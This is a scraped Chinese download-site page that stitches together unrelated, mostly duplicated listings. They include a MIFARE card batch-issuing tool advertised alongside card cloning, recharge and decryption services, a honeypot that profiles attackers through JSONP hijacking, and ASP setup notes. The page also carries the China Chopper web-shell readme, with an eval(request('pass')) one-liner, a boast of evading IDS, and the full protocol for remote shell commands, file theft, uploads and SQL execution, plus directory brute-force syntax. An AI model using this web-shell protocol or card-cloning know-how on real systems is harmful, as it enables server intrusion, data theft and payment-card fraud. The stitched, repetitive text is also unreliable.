《智能卡批量自动发卡系统》《CPU卡演示修改系统》《IC卡交易演示系统》你可以联系我免费要授权号码注意:如果软件打不开,出现mfc100.dll错误,是你电脑环境不对,,要先安装一个vcredist_x86_2010.exe的软件。
--------------------------------------------------------------------------------------------------批量发卡加密的绿色工具,看你有兴趣没,速度非常快,放上卡就好了1000张卡最多半小时发完,可以自动写卡的顺序数据编号,特别适合“捷顺停车卡”,我发了个测试版的你试用一下,需要正式版本的可以找我联系,效率非常高,写好了有提示声音,,这个版本是可以在读卡器ACR122U上面兼容可以用的你联系我要授权号码,主群95952797共享了使用批量方法:1.点加载设备2.输入原始密码一般6个FF,填自己的A/B新密码,3.钩选扇区,填卡序号一般为04.点加载密钥5.点自动批量发卡群共享了,有兴趣的速度,绝对是卡厂的优秀工具,你可以把密码加密成FF测试,速度还可以调技术联系:869375852商业:joly@zerone.asia--------------------------------------------------------------------------------------------------试用版本使用方法:首先跟我要授权号码或软件。
打开我发你的软件“M1智能卡授权卡控制器”,准备ACR122U读卡器并放一个空白的卡,点“加载连接”----“格式化卡扇区”,,如果没有报错,那就是控制卡做好了。
************************************************再打开群共享的“正雍科技智能卡批量自动发卡系统试用版本”点“加载连接”---再输入自己的A/B密码,原始密码一般是6个FF。
输入卡序号可以是0(或你自己想开始编号的号码),密码和编号都写好了----点“加载密码”。
----点“自动批量发卡”。
。
。
就可以了。
卡写对了,编号会加1,发好卡了会提示声音,界面提示加密成功了。
如果你选的那个扇区已经加密过的卡是不会再发卡的,编号不会加1。
卡写好了设备会提示大叫一声的,,放卡声音小一些,,CPU智能卡COS/金融POS机/智能卡读写器/IC卡应用设计开发按需设计生产,提供OEM,ODM智能CPU卡COS,封装双界面或非接方式,主要用在建设部/卫生部,电子钱包应用,带COS系统,通过银行卡检测中心PBOC2.0认证,提供应用DEM,POS机/IC卡应用设计开发.另:提供全套智能卡读写器方案,金融COS,金融应用系统等,按需设计生产,提供OEM,ODM,智能卡应用设计开发---------------------------------------------------------------------------------------------------IC卡复制,充值,卡数据备份,解密等,一卡一密也可以,全加密也可以。
一卡一密加密发卡,,一卡一密解密MiFareIC卡复制,,解密,,写卡,,写UID,,擦卡
--------------------------------------------------------------------------------------------------批量发卡加密的绿色工具,看你有兴趣没,速度非常快,放上卡就好了1000张卡最多半小时发完,可以自动写卡的顺序数据编号,特别适合“捷顺停车卡”,我发了个测试版的你试用一下,需要正式版本的可以找我联系,效率非常高,写好了有提示声音,,这个版本是可以在读卡器ACR122U上面兼容可以用的你联系我要授权号码,主群95952797共享了使用批量方法:1.点加载设备2.输入原始密码一般6个FF,填自己的A/B新密码,3.钩选扇区,填卡序号一般为04.点加载密钥5.点自动批量发卡群共享了,有兴趣的速度,绝对是卡厂的优秀工具,你可以把密码加密成FF测试,速度还可以调技术联系:869375852商业:joly@zerone.asia--------------------------------------------------------------------------------------------------试用版本使用方法:首先跟我要授权号码或软件。
打开我发你的软件“M1智能卡授权卡控制器”,准备ACR122U读卡器并放一个空白的卡,点“加载连接”----“格式化卡扇区”,,如果没有报错,那就是控制卡做好了。
************************************************再打开群共享的“正雍科技智能卡批量自动发卡系统试用版本”点“加载连接”---再输入自己的A/B密码,原始密码一般是6个FF。
输入卡序号可以是0(或你自己想开始编号的号码),密码和编号都写好了----点“加载密码”。
----点“自动批量发卡”。
。
。
就可以了。
卡写对了,编号会加1,发好卡了会提示声音,界面提示加密成功了。
如果你选的那个扇区已经加密过的卡是不会再发卡的,编号不会加1。
卡写好了设备会提示大叫一声的,,放卡声音小一些,,CPU智能卡COS/金融POS机/智能卡读写器/IC卡应用设计开发按需设计生产,提供OEM,ODM智能CPU卡COS,封装双界面或非接方式,主要用在建设部/卫生部,电子钱包应用,带COS系统,通过银行卡检测中心PBOC2.0认证,提供应用DEM,POS机/IC卡应用设计开发.另:提供全套智能卡读写器方案,金融COS,金融应用系统等,按需设计生产,提供OEM,ODM,智能卡应用设计开发---------------------------------------------------------------------------------------------------IC卡复制,充值,卡数据备份,解密等,一卡一密也可以,全加密也可以。
一卡一密加密发卡,,一卡一密解密MiFareIC卡复制,,解密,,写卡,,写UID,,擦卡
2025/11/3 4:33:36
7.99MB
1
笔者曾混迹过各种攻防演练活动,参与过防守方、攻击方,也算是大概了解了每一个队伍的任务~参加防守时印象尤为深刻,也跟一起防守的“战友”做过有趣的事情,例如:反打攻击队;
题外话说的有点多了,来说说为什么开发这样一个平台:作为一个防守方光看日志固然是枯燥无味的,偶尔来几次反向打击啥的,增添防守的乐趣~所以我想到了做这样一个系统,就是想在“空暇”时间能获取点“黑客攻击者”的“画像”。
本平台采用被动式的方式分析黑客攻击者画像,可扩展赋能蜜罐以及安全设备,将平台接口部署在蜜罐Web界面上即可,当攻击者访问所部署的Web界面即触发平台分析功能,对访问者进行分析,数据回传平台分析其网络身份、IP、IP定位:物理地址等信息。
AHRID信息展示平台支持接口授权的方式授权站点,已授权站点才可使用平台接口进行被动式的攻击者画像分析以及数据回传。
AHRID接口授权平台的分析功能采用模块化设计,可针对不同的分析功能新建不同的分析模块进而让平台的分析功能更加丰富完善(开源版本目前只支持JSONP探针模块)AHRID提交模块AHRID开源版使用授权使用登录进AHRID平台之后需要先添加接口授权:AHRID接口授权当添加完毕后,复制接口代码至蜜罐页面或需监测的页面中即可(建议复制到最后),这样就已经部署成功了,只需要等待攻击者触发数据回传功能,等待画像信息即可。
模块提交当已经发现一个JSONP劫持漏洞时,即可提交到AHRID平台上:JSONP劫持漏洞漏洞地址:http://my.website/dorabox/csrf/jsonp.php?callback=test要获取的信息:username模块提交说明:1.名字模块名字(建议使用英文)2.SRC存在JSONP劫持漏洞的URL地址3.回调参数值回调参数的值(参数=值)4.数据字段JSON字段(例如:{"username":"123"},要获取的是username即填写username;
例如:{"data":{"uid":"123"}},要获取的是uid即填写data.uid)5.信息展示地址一般填写无或者随意填写6.模块描述根据模块功能说明AHRID模块提交示例AHRID开源版设计概述当攻击者访问到部署了AHRID接口的页面,即触发JSONP探针获取攻击者已登录状态下的登录信息,回传登录信息+IP+UA,后端会对IP进行物理地址转换,最终将数据记录到数据库。
数据库结构表:Admin-列:id,username,password表:Hackinfo-列:hid,host,ip,user_agent,jsondata,creaye_time,times表:Plugins-列:pid,name,src,callback,columns,url,commit表:Apis-列:aid,hostIP地址转换依赖:GeoLite2-City.mmdbIP定位依赖:接口apis.map.qq.com、way.jd.com+取中心点依赖环境:Python2+Flask+Mysql所需网络环境:互联网(可出网)AHRID开源版搭建1.config.py配置文件修改需要配置的信息如下:USERNAME:Mysql用户名PASSWORD:Mysql用户密码HOST:Mysql主机地址PORT:Mysql端口SECRET_KEY:SESSION秘钥(建议16位以上随机英文字母+数字+特殊符号)TX_KEYS:腾讯接口KEYS(2个以上,参考:https://lbs.qq.com/webservice_v1/guide-ip.html)JCLOUD_KEY:京东云接口KEY(Github可白嫖)2.Mysql创建“ahrid”数据库3.执行如下代码pythonmanage.pydbinitpythonmanage.pydbmigrate4.启动服务:sudopythonapp.py默认端口为:80,可自行修改app.py文件如下代码部分server=pywsgi.WSGIServer(('0.0.0.0',80),app)
题外话说的有点多了,来说说为什么开发这样一个平台:作为一个防守方光看日志固然是枯燥无味的,偶尔来几次反向打击啥的,增添防守的乐趣~所以我想到了做这样一个系统,就是想在“空暇”时间能获取点“黑客攻击者”的“画像”。
本平台采用被动式的方式分析黑客攻击者画像,可扩展赋能蜜罐以及安全设备,将平台接口部署在蜜罐Web界面上即可,当攻击者访问所部署的Web界面即触发平台分析功能,对访问者进行分析,数据回传平台分析其网络身份、IP、IP定位:物理地址等信息。
AHRID信息展示平台支持接口授权的方式授权站点,已授权站点才可使用平台接口进行被动式的攻击者画像分析以及数据回传。
AHRID接口授权平台的分析功能采用模块化设计,可针对不同的分析功能新建不同的分析模块进而让平台的分析功能更加丰富完善(开源版本目前只支持JSONP探针模块)AHRID提交模块AHRID开源版使用授权使用登录进AHRID平台之后需要先添加接口授权:AHRID接口授权当添加完毕后,复制接口代码至蜜罐页面或需监测的页面中即可(建议复制到最后),这样就已经部署成功了,只需要等待攻击者触发数据回传功能,等待画像信息即可。
模块提交当已经发现一个JSONP劫持漏洞时,即可提交到AHRID平台上:JSONP劫持漏洞漏洞地址:http://my.website/dorabox/csrf/jsonp.php?callback=test要获取的信息:username模块提交说明:1.名字模块名字(建议使用英文)2.SRC存在JSONP劫持漏洞的URL地址3.回调参数值回调参数的值(参数=值)4.数据字段JSON字段(例如:{"username":"123"},要获取的是username即填写username;
例如:{"data":{"uid":"123"}},要获取的是uid即填写data.uid)5.信息展示地址一般填写无或者随意填写6.模块描述根据模块功能说明AHRID模块提交示例AHRID开源版设计概述当攻击者访问到部署了AHRID接口的页面,即触发JSONP探针获取攻击者已登录状态下的登录信息,回传登录信息+IP+UA,后端会对IP进行物理地址转换,最终将数据记录到数据库。
数据库结构表:Admin-列:id,username,password表:Hackinfo-列:hid,host,ip,user_agent,jsondata,creaye_time,times表:Plugins-列:pid,name,src,callback,columns,url,commit表:Apis-列:aid,hostIP地址转换依赖:GeoLite2-City.mmdbIP定位依赖:接口apis.map.qq.com、way.jd.com+取中心点依赖环境:Python2+Flask+Mysql所需网络环境:互联网(可出网)AHRID开源版搭建1.config.py配置文件修改需要配置的信息如下:USERNAME:Mysql用户名PASSWORD:Mysql用户密码HOST:Mysql主机地址PORT:Mysql端口SECRET_KEY:SESSION秘钥(建议16位以上随机英文字母+数字+特殊符号)TX_KEYS:腾讯接口KEYS(2个以上,参考:https://lbs.qq.com/webservice_v1/guide-ip.html)JCLOUD_KEY:京东云接口KEY(Github可白嫖)2.Mysql创建“ahrid”数据库3.执行如下代码pythonmanage.pydbinitpythonmanage.pydbmigrate4.启动服务:sudopythonapp.py默认端口为:80,可自行修改app.py文件如下代码部分server=pywsgi.WSGIServer(('0.0.0.0',80),app)
2025/10/29 11:37:37
57.82MB
1
源程序中存放的是用ASP技术开发的一个电子商务网站。
本程序是运用ASP+SQLServer开发的,因此需要机器上安装SQLServer2000。
另外,还需要进行一下其他基本的配置:1.安装IIS(安装方法(略))2.设置IIS:(1)“开始”—>“设置”—>“控制面板”,在“控制面板”中双击“管理工具”,在“管理工具”中双击“Internet服务管理器”图标。
(2)在“Internet服务管理器”对话框中双击计算机名,然后右击“默认Web站点”,从弹出的菜单中选择“属性”菜单,打开“默认Web站点属性”对话框(3)单击“文档”选项卡,点击“添加”按钮,输入“index.asp”,单击“确定”3.在IIS下建立虚拟目录:(1)“开始”—>“设置”—>“控制面板”,在“控制面板”中双击“管理工具”,在“管理工具”中双击“Internet服务管理器”图标。
(2)在“Internet服务管理器”对话框中双击计算机名,然后右击“默认Web站点”,选择“新建”—>“虚拟目录”(3)在“虚拟目录创建向导”中输入虚拟目录的名字,—>“下一步”—>找到源程序所在的文件夹—>单击“确定”4.在SQLServer下附加数据库:(1)打开“企业管理器”,依次展开控制台根目录中的各个选项,在“数据库”文件夹上单击右键,选择“附加数据库”(2)在“附加数据库”向导中找到“源程序”文件夹下的“eshop.mdf”文件,单击确定。
5.运行程序方法:在浏览器的地址栏输入“localhost/(虚拟目录的名字)”。
如:localhost/hj。
其中hj是建立的虚拟目录的名字。
6.在源程序中有一个conn.asp的文件,是数据库连接的文件。
其中有一句话是:connstr="driver={SQLServer};server=(local);UID=sa;PWD=;DATABASE=eshop"其中“pwd=;”后面跟的是SQLServer的密码,由于在建立的时候,本人的SQLServer是空密码,所以pwd后面什么都没有,如果运行的机器上SQLServer上有密码,就在pwd后面加上密码。
本程序是运用ASP+SQLServer开发的,因此需要机器上安装SQLServer2000。
另外,还需要进行一下其他基本的配置:1.安装IIS(安装方法(略))2.设置IIS:(1)“开始”—>“设置”—>“控制面板”,在“控制面板”中双击“管理工具”,在“管理工具”中双击“Internet服务管理器”图标。
(2)在“Internet服务管理器”对话框中双击计算机名,然后右击“默认Web站点”,从弹出的菜单中选择“属性”菜单,打开“默认Web站点属性”对话框(3)单击“文档”选项卡,点击“添加”按钮,输入“index.asp”,单击“确定”3.在IIS下建立虚拟目录:(1)“开始”—>“设置”—>“控制面板”,在“控制面板”中双击“管理工具”,在“管理工具”中双击“Internet服务管理器”图标。
(2)在“Internet服务管理器”对话框中双击计算机名,然后右击“默认Web站点”,选择“新建”—>“虚拟目录”(3)在“虚拟目录创建向导”中输入虚拟目录的名字,—>“下一步”—>找到源程序所在的文件夹—>单击“确定”4.在SQLServer下附加数据库:(1)打开“企业管理器”,依次展开控制台根目录中的各个选项,在“数据库”文件夹上单击右键,选择“附加数据库”(2)在“附加数据库”向导中找到“源程序”文件夹下的“eshop.mdf”文件,单击确定。
5.运行程序方法:在浏览器的地址栏输入“localhost/(虚拟目录的名字)”。
如:localhost/hj。
其中hj是建立的虚拟目录的名字。
6.在源程序中有一个conn.asp的文件,是数据库连接的文件。
其中有一句话是:connstr="driver={SQLServer};server=(local);UID=sa;PWD=;DATABASE=eshop"其中“pwd=;”后面跟的是SQLServer的密码,由于在建立的时候,本人的SQLServer是空密码,所以pwd后面什么都没有,如果运行的机器上SQLServer上有密码,就在pwd后面加上密码。
2025/3/24 21:54:31
305KB
1
用户表(user)UID唯一自增IDUSER_ID用户名USER_NAME用户真实姓名USER_NAME_INDEX用户姓名索引BYNAME登录名USEING_KEY使用USBKEY登录USING_FINGER使用指纹验证PASSWORD用户密码KEY_SN绑定USBKey序列号SECURE_KEY_SN动态密码卡号USER_PRIV角色编号USER_PRIV_NO角色排序号USER_PRIV_NAME角色名称POST_PRIV管理范围POST_DEPT管理范围指定部门DEPT_ID部门IDDEPT_ID_OTHER辅助部门LEAVE_DEPT离职部门IDSEX性别BIRTHDAY生日IS_LUNAR是否农历(1-是,0-否)TEL_NO_DEPT工作电话
2024/10/25 10:14:48
125KB
1
产品名称:中国菜刀(Chinachopper)生产厂家:中国菜刀贸易有限公司厂家地址:http://www.maicaidao.com/----------------------------------------------------------------------------------------------------------免责申明: 请使用者注意使用环境并遵守国家相关法律法规! 由于使用不当造成的后果本厂家不承担任何责任!----------------------------------------------------------------------------------------------------------友情提示:程序在使用过程中难免有各种BUG,到官网看一下是否有更新吧,说不定己经修补了呢。
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
UINCODE方式编译,支持多国语言输入显示。
在非简体中文环境下使用,自动更换成英文界面,翻译有误的地方请留言指正。
一、脚本客户端(包括但不限于EVAL)部分 1)要了解的 服务端只需要简单的一行代码,即可用此程序实现常用的管理功能,功能代码二次编码后发送,过IDS的能力大幅提高。
目前支持的服务端脚本:PHP,ASP,ASP.NET,并且支持https安全连接的网站。
在服务端运行的代码如下: PHP: ASP: ASP.NET: (注意:ASP.NET要单独一个文件或此文件也是Jscript语言) Customize: 自定义类型,功能代码在服务端保存,理论上支持所有动态脚本,只要正确与菜刀进行交互即可。
2)怎么用 在主视图中右键/添加,在弹出的对话框中输入服务端地址,连接的密码(请注意上例中的pass字串),选择正确的脚本类型和语言编码, 保存后即可使用文件管理,虚拟终端,数据库管理三大块功能,同时支持自定义的脚本执行,并可以导入导出数据。
要是其它都没错误,那么可能就是你把语言编码选错了。
1.文件管理:[特色]缓存下载目录,并支持离线查看缓存目录; 2.虚拟终端:[特色]人性化的设计,操作方便;(输入HELP查看更多用法) 3.数据库管理:[特色]图形界面,支持MYSQL,MSSQL,ORACLE,INFOMIX,ACCESS 以及支持ADO方式连接的数据库。
(各种脚本条件下的数据库连接方法请点击数据库管理界面左上角处的配置按钮查看) 注意:由于服务器的安全设置,某些功能可能不能正常使用。
3)关于配置信息怎么填? A)数据库方面: PHP脚本: 类型类型可为MYSQL,MSSQL,ORACLE,INFOMIX中的一种 主机地址主机地址可为机器名或IP地址,如localhost 数据库用户连接数据库的用户名,如root 数据库密码连接数据库的密码,如123455 ASP和ASP.NET脚本: 类型类型只能填ADO ADO配置信息 ADO连接各种数据库的方式不一样。
如MSSQL的配置信息为 Driver={SqlServer};Server=(local);Database=master;Uid=sa;Pwd=123456; 同时,支持NT验证登录MSSQL数据库,并能把查询的结果列表导出为html文件 Customize脚本: 类型类型只能填XDB 与Customize脚本约定的配置信息 菜刀自带的server.jsp数据库参数填写方法如下(两行): MSSQL:com.microsoft.sqlserver.jdbc.SQLServerDriverjdbc:sqlserver://127.0.0.1:1433;databaseName=test;user=sa;password=123456 MYSQL:com.mysql.jdbc.Driverjdbc:mysql://localhost/test?user=root&password=123456 ORACLE:oracle.jdbc.driver.OracleDriverjdbc:oracle:thin:user/password@127.0.0.1:1521/test B)其它方面: 添加额外附加提交的数据,如ASP的新服务端是这样的: 那么,菜刀在配置处填入: SC=function+ff(Server,Response,Request,Application,Session,Error):eval(request("pass")):end+function 然后以密码pass来连接即可。
提交功能前先POST额外的数据包:会话期间只提交一次。
https://target.com/cgi-bin/login.cgi uid=user1&pwd=123456 3)关于HTTP登录验证 SHELL地址这样填http://user:pass@server/server.asp 用户名密码中的特殊字符可用URL编码转换。
二、安全扫描 蜘蛛爬行,绑定域名查询,目录爆破。
命令解释: A)查单一IP的绑定域名 {reverse_ip}{url:http://www.test.com/} B)扫描本C段开放的WEB服务器,并查询绑定域名 {reverse_ip_c}{url:http://www.test.com/} C)只扫描本C段开放的WEB服务器 {reverse_ip_c}{url:http://www.test.com/}{port} D)蜘蛛爬行 {spider}{url:http://www.test.com/} E)蜘蛛爬行,并设定爬行范围 {spider}{url:http://www.test.com/}{range:test.com} F)蜘蛛爬行,过滤重复URL加快速度 加上{filter} G)爆破功能,%s为dict中的一行 flag:后面为返回的数据(含HTTP头部)中的特定关键字 加!!为不包含关键字为TRUE,否则包含关键字为TRUE list.txt为当前目录下的文件,可设为绝对路径,注意:不要包含太多的行。
注:从20100626版开始,list.txt一定要是UNICODE格式的文本文件 {crack}{url:http://%s/admin/}{flag:HTTP/1.1200}{dict:list.txt} {crack}{url:http://%s/admin/}{flag:!!HTTP/1.1404}{dict:list.txt} {crack}{url:http://www.test.com/%s/}{flag:successfully}{dict:list.txt}三、定时提醒 当闹钟来用吧,周期:每月/每周/每日/只一次。
四、快速启动 一些常用的快捷方式放在这里,可以指定用户身份运行程序。
这部分数据是加密存储的。
五、浏览器 就是一个专用的网页浏览器:Post浏览/自定义Cookies,/执行自定义脚本/自动刷新页面/同IP网页搜索。
六、其它部分 等待加入。
文件说明:------------------------------------------------------------------chopper.exe 菜刀程序db.mdb 菜刀的主数据库------------------------------------------------------------------cache.tmp 菜刀的缓存数据库(可删除)readme.txt 你现在正在看的(可删除)[目录]Script 存放菜刀的自写脚本和Customize模式Jsp的一个服务端文件(可删除)----附---------------------------Customize模式菜刀和服务端通信接口---------------------------------------------------------------------------------------------------其它语言的服务端代码可按此接口来编写(请参照server.jsp/server.cfm)---------------------例:菜刀客户端填写的密码为pass,网页编码选的是GB2312注:所有参数都以POST提交,返回的数据都要以->|为开始标记,|<-为结束标记注:返回的错误信息开头包含ERROR://注:\t代表制表符TAB,\r\n代表换行回车,\n代表回车注:数据库配置信息是一个字符串,服务端脚本可以对此字符串格式进行自定义。
--------------------------------------------------------------------------------------------------------------------------------------------------------[得到当前目录的绝对路径]提交:pass=A&z0=GB2312返回:目录的绝对路径\t,如果是Windows系统后面接着加上驱动器列表示例:c:\inetpub\wwwroot\ C:D:E:K:示例:/var/www/html/ [目录浏览]提交:pass=B&z0=GB2312&z1=目录绝对路径返回:先目录后文件,目录名后要加/,文件名后不要加/示例: 目录名/\t时间\t大小\t属性\n目录名/\t时间\t大小\t属性\n 文件名\t时间\t大小\t属性\n文件名\t时间\t大小\t属性\n[读取文本文件]提交:pass=C&z0=GB2312&z1=文件绝对路径返回:文本文件的内容[写入文本文件]提交:pass=D&z0=GB2312&z1=文件绝对路径&z2=文件内容返回:成功返回1,不成功返回错误信息[删除文件或目录]提交:pass=E&z0=GB2312&z1=文件或目录的绝对路径返回:成功返回1,不成功返回错误信息[下载文件]提交:pass=F&z0=GB2312&z1=服务器文件的绝对路径返回:要下载文件的内容[上传文件]提交:pass=G&z0=GB2312&z1=文件上传后的绝对路径&z2=文件内容(十六进制文本格式)返回:要下载文件的内容[复制文件或目录后粘贴]提交:pass=H&z0=GB2312&z1=复制的绝对路径&z2=粘贴的绝对路径返回:成功返回1,不成功返回错误信息[文件或目录重命名]提交:pass=I&z0=GB2312&z1=原名(绝对路径)&z2=新名(绝对路径)返回:成功返回1,不成功返回错误信息[新建目录]提交:pass=J&z0=GB2312&z1=新目录名(绝对路径)返回:成功返回1,不成功返回错误信息[修改文件或目录时间]提交:pass=K&z0=GB2312&z1=文件或目录的绝对路径&z2=时间(格式:yyyy-MM-ddHH:mm:ss)返回:成功返回1,不成功返回错误信息[下载文件到服务器]提交:pass=L&z0=GB2312&z1=URL路径&z2=下载后保存的绝对路径返回:成功返回1,不成功返回错误信息[执行Shell命令(Shell路径前会根据服务器系统类型加上-c或/c参数)]提交:pass=M&z0=GB2312&z1=(-c或/c)加Shell路径&z2=Shell命令返回:命令执行结果[得到数据库基本信息]提交:pass=N&z0=GB2312&z1=数据库配置信息返回:成功返回数据库(以制表符\t分隔),不成功返回错误信息[获取数据库表名]提交:pass=O&z0=GB2312&z1=数据库配置信息\r\n数据库名返回:成功返回数据表(以\t分隔),不成功返回错误信息[获取数据表列名]提交:pass=P&z0=GB2312&z1=数据库配置信息\r\n数据库名\r\n数据表名返回:成功返回数据列(以制表符\t分隔),不成功返回错误信息[执行数据库命令]提交:pass=Q&z0=GB2312&z1=数据库配置信息\r\n数据库名&z2=SQL命令返回:成功返回数据表内容,不成功返回错误信息注意:返回的第一行为表头,接下去每行分别在列表中显示,列数要求一致。
行中的每列后加上\t|\t标记,每行以标记\r\n为结束
2024/10/23 12:54:30
197KB
1
.兄弟我花20元钱在淘宝上买的有需要的朋友去下吧贵了点呵呵各位希望获得手机证书的亲们:非常抱歉的通知大家,根据目前的塞班证书官网的情况,证书制作一事已经无法继续下去。
在这里解释一下:1、原有的证书制作流程是大家提交IMEI号码给我们,我们通过塞班证书官网制作,并传给亲们使用(签名软件安装),所有有此证书制作功能的网站,不管是提供证书下载,还是不提供证书下载的,都是同样的方式。
没有任何区别。
2、目前的证书制作流程有了有巨大的区别,虽然塞班证书官网依然提供开发者证书,但是在IMEI号限制的同时,增加了一个软件所需UID的限制,也就是因为这个限制导致大家无法再使用开发者证书签名软件安装。
3、目前通过我们的努力,已经解决全部机子的证书问题。
(免刷机破解手机)
